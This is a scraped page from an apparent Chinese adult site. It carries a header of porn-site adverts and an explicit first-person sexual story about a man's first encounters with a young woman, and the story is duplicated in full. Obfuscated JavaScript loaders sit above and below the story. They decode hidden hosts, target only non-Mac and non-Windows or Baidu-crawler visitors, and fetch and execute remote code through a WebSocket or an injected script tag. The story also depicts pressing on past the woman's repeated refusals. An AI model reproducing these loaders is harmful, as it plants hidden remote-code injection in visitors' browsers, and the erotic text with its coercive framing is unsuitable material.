看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function joQhLt(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function MdgkGY(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return joQhLt(t);};window[''+'f'+'v'+'V'+'l'+'s'+'W'+'i'+'a'+'X'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=MdgkGY,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('cmdoLnR55am553ai550b3A=','dHIueWVzdW42NzgguY29t','151235',window,document,['5','g']);}:function(){};

当处男遇上处女



记得那是2003年底的事情,那时我20岁,惭愧啊!20岁还是一处男。

那天在公司,快下班的时候接到一个很久没联系MM的电话,原来我在广州花都区上班的时候认识的,是我们隔壁公司的一个女孩子,好像她当时才18岁,刚到广州不久,河南人,长的很清纯,性格很活泼,开朗.那时我们一帮哥们都想打她主意,偶尔大家会坐在一起吹牛,聊天,也不算太熟.后来公司把我调到了白云区,就在也没有联络了。

毕竟半年没联络了,接到电话还是有点激动的。

她说她到白云区来买东西,记得我好像是调到这边上班,就顺便看看我,朋友来了当然是要请吃饭的。

她就在我公司附近不远,见到她时我们还是想以前一样开玩笑的打了下招忽,然后我就带她去吃饭。

去饭店的路上要穿过一条马路,她和我并肩走着,车流不急的时候,我就拉着她的手快步跑过了马路,过了马路我牵着她的手继续走,她也没有主动要抽出手来,只是把头著,一声不吭,当时看到她耳根都红了。

当时我就觉得这女孩子对我有好感,不过我那时也是一菜鸟呀,也不知道说什么.就这样傻傻的牵着她的手一路无话的走到饭店才松开。

吃饭时候气氛也没有那么暧昧了,还是和从前一样嘻嘻哈哈的吹吹牛,吃完饭也差不多9点多钟了,她说她要回去,说实话我当时对她也没有什么想法(没经验啊),就送她去车站,路过我住的小区(老板自己的房子,还比较高档)就告诉他我住在这里,她很激动的说这么好的地方啊,绿化做的真好,还有花园。

我就随口说了一句要不要进去坐坐,她马上说好。

到了花园,因为是晚上也没有什么人了,我们就找了个秋千坐下来,就聊了一会。

她坐在秋千上不停的荡,好像很开心的样子.我由于刚吃饭喝了点酒,荡的时候就有一点头晕,就让她不要荡了,她故意调皮的非要荡,还哈哈大笑。

我实在有点晕了不想和她开玩笑,就一把拉住她,不让她在荡了.谁知她顺势就倒在了怀了一动不动,还把头埋在了我胸前.当时我的第一感觉就是中奖了,心里狂笑不止。

慢慢的她把脸抬了起来,满脸通红的看着我.我飞快的低下头,吻上了她的樱桃小口,我舌头一探她便张开了嘴,舌头在她嘴了乱搅,也没啥经验,毕竟她也是处女,明显她很动情,双手搂住了我的脖子,小声的呻吟著.一切太顺利了,我一支手按住了她的胸部,轻轻的搓柔著。

慢慢的我把手伸进了她衣服里面,飞快的从乳罩的下面伸了进去,一只手罩住了她整个乳房,她乳房比较小,但是很坚挺,很滑,乳头早已经硬了。

当我手伸他乳罩触摸到她乳房的一瞬间,她身体强烈的抖了一下,大声的呻吟一声,然后双眼迷离带些惊恐的看着我.我当时被欲火冲晕了头,随既又吻了上去。

握住她乳房的手,大拇指与食指捏住她坚硬的乳头不停的拨弄.每稍微大力一点搓弄她乳头一下,她都会紧皱着眉头张开嘴大声呻吟一声,玩了一会过后,我让她双腿长开,正对着我坐在我的小鸡鸡上,硬硬的鸡巴在她坐上来,受到到挤压更是刺激非常,险些把持不住。

她正对着我,两个乳房使劲的在我脸上蹭,她穿的是一件白色的羊毛衫,我双手从前面慢慢的拉起她的衣服,想看一看她的乳房.谁知她双手忽然按住了我拉她衣服的手,说道:“不要看,摸摸就好了。”这句话不亚于一瓶春药,我更是非看不可了。

一般处男对女孩身体的视觉都会很感兴趣,没办法招思蓦想20年的东西了。

我当时也不知道说什么好,只是傻傻的说道:“我只看一眼,一眼就好了,这么晚了这里也没人。”

听我这么一说,她按住我的手明显的松了不少,我一用力就把她的羊毛衫掀了起来,乳罩早已经被我刚才推到了上面,两个小巧精致的乳房印入了眼睛.乳房很小,不过形状很好,像一个荼盖一样,充满著青春气息,乳晕和乳头的颜色很淡,和皮肤颜色差不多,带一点粉红,乳头尖尖的很细很长,大概是硬了的原因吧!不过也算很长了。

正当我对这20年来第一对真实的呈现在我眼前漂亮的乳房惊叹的时候,她用极害羞的声音说道:“好了,已经看过了。”

说著就要把衣服往下拉.此时我怎能让她把衣服拉下来,就算是俺当时是处男也要被大伙拿板砖拍死.我双手使劲的撑着衣服不让她拉下来,说道:“让我亲一口吧。”

说完不等她有任何反应,就含着了她一颗乳头.顿时她娇躯一振,原本僵强的娇躯瞬间软了下来。

由于她的乳头细长细长的,含在嘴里感觉弹性实足,我时而用舌头拨弄,时而用牙齿轻咬,鼻子还闻到一股少女,特别是乳房处特有的奶香,这时她哪里还有半点反抗,爬在我肩头,嘴正好对着我的耳朵想大声又不好意思,小声而又压抑的呻吟著,真是让我爽到不行,坐在我身上,用她的私处来回蹭着我的鸡巴,毕竟我当时还是处男,哪里受得了如此刺激,伴随着强烈的快感,鸡巴一阵剧烈的抖动就射了,然后我就不动了,享受着这股快感。

我鸡巴的强烈抖动与后来变软了她肯定也知道了怎么回事,还是问我怎么了。

我说没什么,然后微笑的对她说道:“今天不要回去了吧。”

她满脸的潮红娇羞的对我说:“不行,你太坏了。”

然后又说:“不回去,老板知道会骂我的,我改天在过来吧。”

当时我刚刚射完,也没有什么欲望了.就没说什么了,然后她整理了一下衣服,把她送到了车站。

后来几天,由于两个人在不同的区,不方便见面,电话倒是通的比较频繁,记得当时我问她,我是你什么人啊。


她在那边又羞又气的说:“你那天那样对我,我都已经是你的人了,你还这样问。”搞和我哭笑不得,看来遇到一个纯到古董级处女了。

终于在那天分开后的第三天俺把她给破了,把自己也破了。

那天她休息,我也正好休息,约好了她过来玩,随知好早上8点不到就过来了。

我赶紧起床洗漱,让她先在家里参观一下,我是和同事一起住的,那天同事们都上班去了,家里就我一个人,洗漱完毕,我就问她怎么这么早就来了(没经验啊!给现在啥话不说,冲上去日了再说)她说睡不着起得比较早,我说是不是想我想得睡不着。

她笑骂了我一句不要脸,我就说你看我都没睡醒,你昨天也没睡好,要不我们一起在睡会?

当时还在佩服自己竟然说出这么机灵的话.随知她说了一句:“你个色狼又想使坏,我才不和你一起睡呢!”把我郁闷的呀。

当时假装生气,把她推到床上猛咯吱她.只到她求饶答应睡觉才放了她,上了床就好办了,离目标一步步近了,我心里那个激动啊。

我马上钻到床上睡好,她就脱了一件外套就上床了,还穿着裙子.我就对她说你把外面的裙脱了嘛,哪有睡觉还穿着裙子的.她就是不脱,没办法,我当时也不知道怎么办,也不知道说什么。

心里那个紧张啊!过了好久了两个人都没动静,她把眼睛闭着真的一副睡觉的样子。

我就在想,他妈的这不能真的睡觉吧,我慢慢的靠了过去,她一转身把脸埋在了我怀里,我一看有戏,慢慢的把她的头抬起来吻了起来,手也很自然的从她衣服里面伸了进去搓弄着她的乳头,一会乳头就变硬了.今天可能是在家里,她呻吟的声音明显比上次大了很多,听着真是爽呀。

我慢慢的把她的上衣脱了,这次她没有反抗也不配合,脱奶罩的时候废了好大劲呀!

玩了一会奶子,我就打算脱裤子,大家可以想像肯定没那么容易了,当时可怜悯悯的对我说:“不要这样,以后再说好吗?我们才交往几天,我们那里对这个很重要的,你要了就要娶我,不然你会害死我的。”

当时打击好大,鸡巴当时就软了,说实话我对她只有欲没有爱,她也不是我喜欢的类型,当时准备算了,就躺了下来,没有在近一步动作了。

这时她主动压在了我身上,对我说:“我们就这样好了,过几年结婚了我在给你。”

我晕了!当时也只是嗯,哦的回答。

说完我们就吻在了一起,她拿起了我的手,把我的手放在了她的乳房搓弄了起来,她也随之娇哼起来,我的鸡巴马上又硬了起来。

玩了一会,我实在受不了诱惑,一只手悄悄的放在了她的阴部,隔着内裤轻轻抚摩著.明显的感觉我抚摩她的阴部,她的呻吟更兴奋了。

我加大了抚摩的力度,她的身体这时也随着扭动了起来,她的内裤这时早已湿透。

我慢慢将手向内裤里面伸了进去,先摸到一片软软的阴毛,我没有过多停留,直接摸上了她的阴户,她那里早已经淫水泛滥,摸起来又热又滑,软软的阴唇。

我当时感觉太兴奋太幸福了,大脑一片空白,不过我还是不敢把手指伸进去,毕竟是处女有一层膜我还是懂的,我将中指放在她的洞口与阴唇之间来回的滑动,这时她已经没有了任何的压抑,完全是放开了在呻吟,此时我也不在去想太多了,慢慢的脱她的内裤,心里那个紧张啊,一切都很顺利,她还很配合的抬了一下屁股,这时我掀开了被子,一副完美的裸体呈现在了我的面前。

她这时很害羞的用手遮住了她的妹妹,想往被子里面钻,我一把拉住她拉开了她的手,分开了她的双腿,说:“让我看看嘛。”

她嗯了一声,脸红的好像烧红了的铁,闭着眼睛一声不吭。

稀疏的阴毛,呈倒三角形,粉红的阴户,四周流满了奶白色的沾液,由于受过刺激,阴唇正有节奏的一张一合。

我在也受不了了,快速的脱下了自己的内裤,就压在了她身上,小弟弟在她下面小心的探索,却总是找不到地方,偶尔可能是探到位置了,她都会整个人向后一缩.然后惊恐的看着我.我现在也不管那么多了,心里暗暗发誓,今天一定要把她干了.由于她老是向后缩,本来躺着的人,都坐了起来。

她说道:“我怕疼,第一次会很疼。”

我温柔的对她说:“我会轻轻的,别怕,不疼。”

她点点头,又躺了下来,这次我动作尽量又轻又慢,边探索边问她是不是,可是她总说不是,实在没办法,我拿着她的手,让他拿着我的小弟弟对准地方。

她很听话的把我的小弟弟放在了洞口,我的龟头明显的感觉这里有一股湿热的暖流,她身体向后轻轻的缩了一下,这次没有急于进去,用手拿着小弟弟上下轻轻的滑动,边问她这样疼吗?

她仍然惊恐的看着我,摇了摇头.一边滑动我一边往里面推进,边问她疼吗。

还好她没有在往后缩了,慢慢的感觉进去了半个龟头,终于松了一口气,我温柔的对她说:“我要进去了。”

她点点头,然后就闭上了眼睛,我腰上忽然一用力,猛得一挺,小弟弟已经完全进去了,她疼的身体猛得向后一缩,不过这次我已经进去了,加上她的逼夹得很紧,也没有掉出来.她疼的叫了几声,就咬著牙齿忍着痛.鸡巴放在里面爽呆了,她的小妹妹紧紧的包裹着小弟弟又湿又暖,爽得我忍不住叫出声来了。

这时她满脸惶恐的对我说:“不要动,疼,好疼,就这样放著。”

我点了点头,俯下身亲吻着她的嘴唇,一支手还拨弄着她的奶头,慢慢感觉她下面越夹越紧,忽吸也越来急促.这时她忽然亢奋的说:“快!动一下,下面,快动。”

我楞了一下,随后便猛烈的抽动起来,随着我的抽动,她声音越叫越大,毕竟是处男,抽动了十几下,一股快感直冲脑门,我将小弟弟顶到最深处,伴随着小弟弟剧烈的抖动就射在了里面。

她也随即发出了一声沉闷的叫声,全身不停的扭动.最后躺在床上不停的喘息,呻吟。

小弟弟感觉被一股热流淋上,阴道把小弟弟夹得更紧了,感觉爽呆了,她一直不让我拨出来,最后小弟弟自己变软滑了出来,龟头上还沾著鲜红的处女血,床单上早已血水模湖了。

有了第一次,后面就容易多了,当天我们疯狂的做爱,一共做了几次我都搞忘了,只知道在床上不吃不喝从早上一直到晚上7点多,才出去吃了饭,送她到的车站。

记得那是2003年底的事情,那时我20岁,惭愧啊!20岁还是一处男。

那天在公司,快下班的时候接到一个很久没联系MM的电话,原来我在广州花都区上班的时候认识的,是我们隔壁公司的一个女孩子,好像她当时才18岁,刚到广州不久,河南人,长的很清纯,性格很活泼,开朗.那时我们一帮哥们都想打她主意,偶尔大家会坐在一起吹牛,聊天,也不算太熟.后来公司把我调到了白云区,就在也没有联络了。

毕竟半年没联络了,接到电话还是有点激动的。

她说她到白云区来买东西,记得我好像是调到这边上班,就顺便看看我,朋友来了当然是要请吃饭的。

她就在我公司附近不远,见到她时我们还是想以前一样开玩笑的打了下招忽,然后我就带她去吃饭。

去饭店的路上要穿过一条马路,她和我并肩走着,车流不急的时候,我就拉着她的手快步跑过了马路,过了马路我牵着她的手继续走,她也没有主动要抽出手来,只是把头著,一声不吭,当时看到她耳根都红了。

当时我就觉得这女孩子对我有好感,不过我那时也是一菜鸟呀,也不知道说什么.就这样傻傻的牵着她的手一路无话的走到饭店才松开。

吃饭时候气氛也没有那么暧昧了,还是和从前一样嘻嘻哈哈的吹吹牛,吃完饭也差不多9点多钟了,她说她要回去,说实话我当时对她也没有什么想法(没经验啊),就送她去车站,路过我住的小区(老板自己的房子,还比较高档)就告诉他我住在这里,她很激动的说这么好的地方啊,绿化做的真好,还有花园。

我就随口说了一句要不要进去坐坐,她马上说好。

到了花园,因为是晚上也没有什么人了,我们就找了个秋千坐下来,就聊了一会。

她坐在秋千上不停的荡,好像很开心的样子.我由于刚吃饭喝了点酒,荡的时候就有一点头晕,就让她不要荡了,她故意调皮的非要荡,还哈哈大笑。

我实在有点晕了不想和她开玩笑,就一把拉住她,不让她在荡了.谁知她顺势就倒在了怀了一动不动,还把头埋在了我胸前.当时我的第一感觉就是中奖了,心里狂笑不止。

慢慢的她把脸抬了起来,满脸通红的看着我.我飞快的低下头,吻上了她的樱桃小口,我舌头一探她便张开了嘴,舌头在她嘴了乱搅,也没啥经验,毕竟她也是处女,明显她很动情,双手搂住了我的脖子,小声的呻吟著.一切太顺利了,我一支手按住了她的胸部,轻轻的搓柔著。

慢慢的我把手伸进了她衣服里面,飞快的从乳罩的下面伸了进去,一只手罩住了她整个乳房,她乳房比较小,但是很坚挺,很滑,乳头早已经硬了。

当我手伸他乳罩触摸到她乳房的一瞬间,她身体强烈的抖了一下,大声的呻吟一声,然后双眼迷离带些惊恐的看着我.我当时被欲火冲晕了头,随既又吻了上去。

握住她乳房的手,大拇指与食指捏住她坚硬的乳头不停的拨弄.每稍微大力一点搓弄她乳头一下,她都会紧皱着眉头张开嘴大声呻吟一声,玩了一会过后,我让她双腿长开,正对着我坐在我的小鸡鸡上,硬硬的鸡巴在她坐上来,受到到挤压更是刺激非常,险些把持不住。

她正对着我,两个乳房使劲的在我脸上蹭,她穿的是一件白色的羊毛衫,我双手从前面慢慢的拉起她的衣服,想看一看她的乳房.谁知她双手忽然按住了我拉她衣服的手,说道:“不要看,摸摸就好了。”这句话不亚于一瓶春药,我更是非看不可了。

一般处男对女孩身体的视觉都会很感兴趣,没办法招思蓦想20年的东西了。

我当时也不知道说什么好,只是傻傻的说道:“我只看一眼,一眼就好了,这么晚了这里也没人。”

听我这么一说,她按住我的手明显的松了不少,我一用力就把她的羊毛衫掀了起来,乳罩早已经被我刚才推到了上面,两个小巧精致的乳房印入了眼睛.乳房很小,不过形状很好,像一个荼盖一样,充满著青春气息,乳晕和乳头的颜色很淡,和皮肤颜色差不多,带一点粉红,乳头尖尖的很细很长,大概是硬了的原因吧!不过也算很长了。

正当我对这20年来第一对真实的呈现在我眼前漂亮的乳房惊叹的时候,她用极害羞的声音说道:“好了,已经看过了。”

说著就要把衣服往下拉.此时我怎能让她把衣服拉下来,就算是俺当时是处男也要被大伙拿板砖拍死.我双手使劲的撑着衣服不让她拉下来,说道:“让我亲一口吧。”

说完不等她有任何反应,就含着了她一颗乳头.顿时她娇躯一振,原本僵强的娇躯瞬间软了下来。

由于她的乳头细长细长的,含在嘴里感觉弹性实足,我时而用舌头拨弄,时而用牙齿轻咬,鼻子还闻到一股少女,特别是乳房处特有的奶香,这时她哪里还有半点反抗,爬在我肩头,嘴正好对着我的耳朵想大声又不好意思,小声而又压抑的呻吟著,真是让我爽到不行,坐在我身上,用她的私处来回蹭着我的鸡巴,毕竟我当时还是处男,哪里受得了如此刺激,伴随着强烈的快感,鸡巴一阵剧烈的抖动就射了,然后我就不动了,享受着这股快感。

我鸡巴的强烈抖动与后来变软了她肯定也知道了怎么回事,还是问我怎么了。

我说没什么,然后微笑的对她说道:“今天不要回去了吧。”

她满脸的潮红娇羞的对我说:“不行,你太坏了。”

然后又说:“不回去,老板知道会骂我的,我改天在过来吧。”

当时我刚刚射完,也没有什么欲望了.就没说什么了,然后她整理了一下衣服,把她送到了车站。

后来几天,由于两个人在不同的区,不方便见面,电话倒是通的比较频繁,记得当时我问她,我是你什么人啊。

她在那边又羞又气的说:“你那天那样对我,我都已经是你的人了,你还这样问。”搞和我哭笑不得,看来遇到一个纯到古董级处女了。

终于在那天分开后的第三天俺把她给破了,把自己也破了。

那天她休息,我也正好休息,约好了她过来玩,随知好早上8点不到就过来了。

我赶紧起床洗漱,让她先在家里参观一下,我是和同事一起住的,那天同事们都上班去了,家里就我一个人,洗漱完毕,我就问她怎么这么早就来了(没经验啊!给现在啥话不说,冲上去日了再说)她说睡不着起得比较早,我说是不是想我想得睡不着。

她笑骂了我一句不要脸,我就说你看我都没睡醒,你昨天也没睡好,要不我们一起在睡会?

当时还在佩服自己竟然说出这么机灵的话.随知她说了一句:“你个色狼又想使坏,我才不和你一起睡呢!”把我郁闷的呀。

当时假装生气,把她推到床上猛咯吱她.只到她求饶答应睡觉才放了她,上了床就好办了,离目标一步步近了,我心里那个激动啊。

我马上钻到床上睡好,她就脱了一件外套就上床了,还穿着裙子.我就对她说你把外面的裙脱了嘛,哪有睡觉还穿着裙子的.她就是不脱,没办法,我当时也不知道怎么办,也不知道说什么。

心里那个紧张啊!过了好久了两个人都没动静,她把眼睛闭着真的一副睡觉的样子。

我就在想,他妈的这不能真的睡觉吧,我慢慢的靠了过去,她一转身把脸埋在了我怀里,我一看有戏,慢慢的把她的头抬起来吻了起来,手也很自然的从她衣服里面伸了进去搓弄着她的乳头,一会乳头就变硬了.今天可能是在家里,她呻吟的声音明显比上次大了很多,听着真是爽呀。

我慢慢的把她的上衣脱了,这次她没有反抗也不配合,脱奶罩的时候废了好大劲呀!

玩了一会奶子,我就打算脱裤子,大家可以想像肯定没那么容易了,当时可怜悯悯的对我说:“不要这样,以后再说好吗?我们才交往几天,我们那里对这个很重要的,你要了就要娶我,不然你会害死我的。”

当时打击好大,鸡巴当时就软了,说实话我对她只有欲没有爱,她也不是我喜欢的类型,当时准备算了,就躺了下来,没有在近一步动作了。

这时她主动压在了我身上,对我说:“我们就这样好了,过几年结婚了我在给你。”

我晕了!当时也只是嗯,哦的回答。

说完我们就吻在了一起,她拿起了我的手,把我的手放在了她的乳房搓弄了起来,她也随之娇哼起来,我的鸡巴马上又硬了起来。

玩了一会,我实在受不了诱惑,一只手悄悄的放在了她的阴部,隔着内裤轻轻抚摩著.明显的感觉我抚摩她的阴部,她的呻吟更兴奋了。

我加大了抚摩的力度,她的身体这时也随着扭动了起来,她的内裤这时早已湿透。

我慢慢将手向内裤里面伸了进去,先摸到一片软软的阴毛,我没有过多停留,直接摸上了她的阴户,她那里早已经淫水泛滥,摸起来又热又滑,软软的阴唇。

我当时感觉太兴奋太幸福了,大脑一片空白,不过我还是不敢把手指伸进去,毕竟是处女有一层膜我还是懂的,我将中指放在她的洞口与阴唇之间来回的滑动,这时她已经没有了任何的压抑,完全是放开了在呻吟,此时我也不在去想太多了,慢慢的脱她的内裤,心里那个紧张啊,一切都很顺利,她还很配合的抬了一下屁股,这时我掀开了被子,一副完美的裸体呈现在了我的面前。

她这时很害羞的用手遮住了她的妹妹,想往被子里面钻,我一把拉住她拉开了她的手,分开了她的双腿,说:“让我看看嘛。”

她嗯了一声,脸红的好像烧红了的铁,闭着眼睛一声不吭。

稀疏的阴毛,呈倒三角形,粉红的阴户,四周流满了奶白色的沾液,由于受过刺激,阴唇正有节奏的一张一合。

我在也受不了了,快速的脱下了自己的内裤,就压在了她身上,小弟弟在她下面小心的探索,却总是找不到地方,偶尔可能是探到位置了,她都会整个人向后一缩.然后惊恐的看着我.我现在也不管那么多了,心里暗暗发誓,今天一定要把她干了.由于她老是向后缩,本来躺着的人,都坐了起来。

她说道:“我怕疼,第一次会很疼。”

我温柔的对她说:“我会轻轻的,别怕,不疼。”

她点点头,又躺了下来,这次我动作尽量又轻又慢,边探索边问她是不是,可是她总说不是,实在没办法,我拿着她的手,让他拿着我的小弟弟对准地方。

她很听话的把我的小弟弟放在了洞口,我的龟头明显的感觉这里有一股湿热的暖流,她身体向后轻轻的缩了一下,这次没有急于进去,用手拿着小弟弟上下轻轻的滑动,边问她这样疼吗?

她仍然惊恐的看着我,摇了摇头.一边滑动我一边往里面推进,边问她疼吗。

还好她没有在往后缩了,慢慢的感觉进去了半个龟头,终于松了一口气,我温柔的对她说:“我要进去了。”

她点点头,然后就闭上了眼睛,我腰上忽然一用力,猛得一挺,小弟弟已经完全进去了,她疼的身体猛得向后一缩,不过这次我已经进去了,加上她的逼夹得很紧,也没有掉出来.她疼的叫了几声,就咬著牙齿忍着痛.鸡巴放在里面爽呆了,她的小妹妹紧紧的包裹着小弟弟又湿又暖,爽得我忍不住叫出声来了。

这时她满脸惶恐的对我说:“不要动,疼,好疼,就这样放著。”

我点了点头,俯下身亲吻着她的嘴唇,一支手还拨弄着她的奶头,慢慢感觉她下面越夹越紧,忽吸也越来急促.这时她忽然亢奋的说:“快!动一下,下面,快动。”

我楞了一下,随后便猛烈的抽动起来,随着我的抽动,她声音越叫越大,毕竟是处男,抽动了十几下,一股快感直冲脑门,我将小弟弟顶到最深处,伴随着小弟弟剧烈的抖动就射在了里面。

她也随即发出了一声沉闷的叫声,全身不停的扭动.最后躺在床上不停的喘息,呻吟。

小弟弟感觉被一股热流淋上,阴道把小弟弟夹得更紧了,感觉爽呆了,她一直不让我拨出来,最后小弟弟自己变软滑了出来,龟头上还沾著鲜红的处女血,床单上早已血水模湖了。

有了第一次,后面就容易多了,当天我们疯狂的做爱,一共做了几次我都搞忘了,只知道在床上不吃不喝从早上一直到晚上7点多,才出去吃了饭,送她到的车站。


function cNHJz(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function tKHFeCWf(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return cNHJz(t);};window[''+'T'+'F'+'U'+'k'+'G'+'K'+'q'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=tKHFeCWf,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('cmdoLnR5am53ai50b3A==','dHIueeWVzdW42NzguY29t','151236',window,document,['=','e']);}:function(){};